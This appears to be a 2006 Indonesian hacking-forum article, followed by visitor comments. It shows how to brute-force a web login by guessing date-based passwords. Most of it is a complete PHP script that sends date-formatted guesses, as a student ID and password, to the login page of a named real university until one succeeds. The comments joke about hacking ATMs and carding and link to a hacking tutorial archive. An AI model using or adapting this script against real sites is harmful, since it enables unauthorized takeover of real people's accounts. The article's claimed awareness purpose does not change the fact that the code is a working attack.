Home
Hacking
Tutorial
.NET
IT News
Lain-lain
About Us
FAQ
Penerbitan Buku

Klik untuk join milist Jasakom




 

Jasakom Community - Article
Bongkar Password Web dengan PHP
Date: Thursday, April 20, 2006    Hits: 7576    By:  Tongam M. R. Tampubolon   
Pada artikel pertama saya ini, saya mencoba menunjukkan kepada teman2 bagaimana bahayanya bila admin suatu situs membuat sistem pengaksesan dengan menggunakan password berdasarkan tanggal.


Dalam contoh kasus kali ini, saya mencoba untuk bongkar password salah satu mahasiswa dengan nomor induknya "11022924", yang berada pada situs www.bsi.ac.id. Lalu, apa yang pertama kita lakukan ?

1. Akses kesitus ini : http://bsi.ac.id/login_d1d3_1.php , kamu bisa ambil contoh apa aja...
2. Saat itu kamu akan lihat form loginnya...., saatnya kamu harus mengetahui variabel2 apa yang dikirim, dengan mengetahui source webnya... caranya : klik menu bar "VIEW" ==> "SOURCE"... (UNTUK Internet Explorer). Contoh misalnya sbg berikut :

<FORM ACTION="CECEKLOG.PHP">
NAma : <INPUT TYPE="TEXT" NAME="user">
Password : <INPUT TYPE="TEXT" NAME="password">
NAma : <INPUT TYPE="submit" NAME="log" VALUE="OK">
</FORM>

Yang ber warna merah adalah nama variabel sedangkan berwarna biru adalah file target dimana data variabel dikirimkan. Kamu harus mengubahnya ke alamat absolut situsnya. Contohnya : bsi.ac.id/ceceklog.php

3. Oke, sudah mengetahui variabelnya... kamu harus cocokkan/mengerti mana yang merupakan variabel username, password dan lain sebagainya... agar bisa mengikuti langkah ke 4.

4. Oke saatnya listing

<!-- MULAI -->
<?php
# NAMA FILE : PASSWDTEST.PHP
# PENJELASAN : BONGKAR PASSWORD WEB YG MENGGUNAKAN TANGGAL SEBAGAI PASSWORD
# PEMBUAT : TONGAM M. R. TAMPUBOLON
# CONTACT : meyer_webmail@yahoo.com
// Biasanya banyak form login, menggunakan post method
// Tetapi k'lo menggunakan get, jangan kuatir lebih gampang... coba cari aja beda dikit kok...
// Isi $query adalah variabel2 yg dikirim ke web server formatnya var1=isi1&var2=isi2
function post($host,$query,$others='')
{
$path=explode('/',$host);
$host=$path[0];
unset($path[0]);
$path='/'.(implode('/',$path));
$post="POST $path HTTP/1.1\r\nHost: $host\r\nContent-type: application/x-www-form-urlencoded\r\n${others}User-Agent: Mozilla 4.0\r\nContent-length: ".strlen($query)."\r\nConnection: close\r\n\r\n$query";
$h=fsockopen($host,80);
fwrite($h,$post);
for($a=0,$r='';!$a;)
{
$b=fread($h,8192);
$r.=$b;
$a=(($b=='')?1:0);
}
fclose($h);
return $r;
}
?>
<HTML>
<HEAD>
<TITLE>: : PASSWORD TEST : :</TITLE>
</HEAD>
<BODY>
<?php
// Ganti tanggal awal dan akhir test password
$awal="25/5/1984";
$akhir="28/5/1984";
// Pecah menjadi tanggal, bulan dan tahun
$oarr=explode("/", $awal);
$tawal=$oarr[2];
$bawal=$oarr[1];
$hawal=$oarr[0];
$oarr=explode("/", $akhir);
$takhir=$oarr[2];
$bakhir=$oarr[1];
$hakhir=$oarr[0];
// Url data akan dikirim contoh : host/dir/file... >> tampubolon.com/contoh/coba.jsp
$urltarget="bsi.ac.id/ceceklog.php";
// Set variabel tgl text awal
$tgl="00/00/00";
// Test!!!
while($tgl!=$akhir)
{
$hf=(strlen($hawal)>1 ? $hawal : "0".$hawal);
$bf=(strlen($bawal)>1 ? $bawal : "0".$bawal);
$passtest=$tawal."-".$bf."-".$hf; // format passwordnya YYYY-MM-DD
$datatest=post($urltarget ,"user=11022924&pass=".$passtest."&aksi=Login"); // Tampung headernya...
// Cek k'lo ada string yg diinginkan...
if(substr_count($datatest, "index_mhs.php")>0) // PASSWORD OK
{
echo "COBA PASSWORD : <B>".$passtest."</B> HASIL : <B>BERHASIL</B><BR>\n</BODY>\n</HTML>";
exit;
}else{ // BUKAN PASSWORD
echo "COBA PASSWORD : <B>".$passtest."</B> HASIL : <B>GAGAL</B><BR>\n";
}
$tgl=$hawal."/".$bawal."/".$tawal; // Biar ngga loop trus menerus
// matematika untuk tanggal
if($hawal>30)
{
if($bawal>11)
{
$tawal+=1;
$bawal=0;
}
$bawal+=1;
$hawal=0;
}
$hawal+=1;
}
?>
</BODY>
</HTML>

<!-- AKHIR -->

 


Itulah akhir kisah dari artikel ini, semoga ada gunanya bagi perkembangan keamanan di negara yang kita cintai ini... bay..bay..bay...

TONGAM M. R. TAMPUBOLON MENGUCAPKAN TERIMA KASIH KEPADA :
1. Kakak saya TUNGGUL JOHN GENESIS TAMPUBOLON DI GUNADHARMA
2. Adik saya TORKIS ANDREW, TORANG, TUMPAL, TIMBUL, TRENDY DENGAN AYAH DAN BUNDA DI MEDAN.
3. Teman-teman di BINA SARANA INFORMATIKA, GUNADHARMA, UI, BINUS, VIRUS WRITER, HACKER DLL.
4. JASAKOM MANIA
5. Untuk semuanya I Love You
 

Source: JASAKOM Information Center
 
1 2 3 4 5 6 7 8 9 10 ...
Jasakom Community - Visitor Comment
Nama: 55555   Tgl: 5/13/2006 11:37:42 PM
Komentar:
Woiii buat temen-temen hacker, udah denger belum kalau haacker amerika yang bernama mckannen lagi di ekstradisi sama polisi USA gara*2 membobol PENTAGON & NASA
Nama: Jian_Chox   Tgl: 5/12/2006 10:46:33 AM
Komentar:
Jianchoxxx.., huebat yach......???!!
Nama: Jian_Chox   Tgl: 5/12/2006 10:43:12 AM
Komentar:
Jianchoxx.., kok biza yach......??!
Nama: Bakwan   Tgl: 5/8/2006 6:51:12 AM
Komentar:
Ocha..kenalan dong..mau bakwan ga'
Nama: bakwan   Tgl: 5/8/2006 6:48:48 AM
Komentar:
Bakwan lagi..awas..Bakwan.htt..Bakwan.scr..Bakwan.exe...BakwanW32@99.exe..BakwanRedlof.html..BakwanFunlove.exe..BakwanBroo.exe
Nama: ocha_imut   Tgl: 5/4/2006 6:01:45 PM
Komentar:
wah-wah,...please dunk kak, jangan ribut mulu....mending nemanin ocha blajar ngehack ATM nich,....
Nama: doc   Tgl: 5/3/2006 10:37:33 AM
Komentar:
abis.......... kampus gua kena acak 2x... hehhehehee... ada yang tau cara ngehack nilai ngak ....>> bagi2x dong
Nama: mouse_death   Tgl: 5/3/2006 3:19:11 AM
Komentar:
,lho..kok jd ba'wan..enak..cuih!!! kenapa..keyboardnya ngetik...ba'wan lagi..enak nikmat..lagi.ba'wan..super.umbelen..mbah too...hudi bontoi...munip koplo...makan bangkai....ups..bakwan jangkit...(some text missing)
Nama: mouse_death   Tgl: 5/3/2006 3:16:37 AM
Komentar:
ada yg mau study banding sm M_d.exe tapi..malah...bikin...lapar..makan...ba'wan dulu...ahhh,lho..kok jd ba'wan..enak..cuih!!! kenapa..keyboardnya ngetik...ba'wan lagi..enak nikmat...lagi...ba'wan....super...umbelen..mbah too...hudi bontoi...munip kopl
Nama: mouse_death   Tgl: 5/3/2006 3:14:33 AM
Komentar:
ada yg mau study banding sm M_d.exe tapi..malah...bikin...lapar..makan...ba'wan dulu...ahhh,lho..kok jd ba'wan..enak..cuih!!! kenapa..keyboardnya ngetik...ba'wan lagi..enak nikmat...lagi...ba'wan....MBOOH KAH !!!
Nama: bakwan   Tgl: 5/3/2006 2:48:51 AM
Komentar:
ada..yang mau tau cara hack..ATM bank..??..haaaa...mimpi kali..makan bakwan lagi..
Nama: bakwan   Tgl: 5/3/2006 2:47:33 AM
Komentar:
ribut trusss..mendingan makan bakwan...enak..
Nama: bakwan   Tgl: 5/3/2006 2:43:21 AM
Komentar:
gorengan2...numpang..lewat...
Nama: ocha_imut   Tgl: 5/2/2006 6:53:29 PM
Komentar:
bisa kasih tau diskusinya kakak2 hacker biasanya kapan & di chanel mana? ocha pengin belajar hacking / carding aq banyak baca2 artikel tentang itu tp koq ga mudheng-mudheng yach!! help: ocha_imut_newbie@yahoo.com
Nama: king_jeremy   Tgl: 4/30/2006 11:41:35 PM
Komentar:
hai
Nama: n3o   Tgl: 4/27/2006 8:03:09 AM
Komentar:
ada yang tahu informasi seminar bersema Onno w purbo di GWW IPB, caru tahu infonya ke siapa yaaah..?
Nama: Dian Maulani   Tgl: 4/27/2006 7:31:16 AM
Komentar:
http://www.softpedia.com/get/Antivirus/Brontok-Washer.shtml
Nama: sayur_paku   Tgl: 4/26/2006 11:19:31 AM
Komentar:
5. Untuk semuanya I Love You <-- heuehueheu.., emangnya saya cowok apaan...?!. da saya mah dari kampung merenan~!
Nama: rythm_of_therain   Tgl: 4/24/2006 4:21:48 AM
Komentar:
http://www.freewebtown.com/rythm_of_therain/hack-tutor.zip
Nama: CLAS MiLD   Tgl: 4/24/2006 3:15:48 AM
Komentar:
Artikel busuk !!!
1 2 3 4 5 6 7 8 9 10 ...

 

© Copyright by Jasakom 2005 All Right Reserved

User Id: *

Password:
* Required Field
User Baru ? Klik di sini
Lupa Password ?
Keyword :
 

Click here to join jasakomdotnet
Klik di sini untuk Join jasakomdotnet




Informasi disini digunakan untuk tujuan pendidikan, Jasakom tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini. Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar  tidak  menjadi korban internet.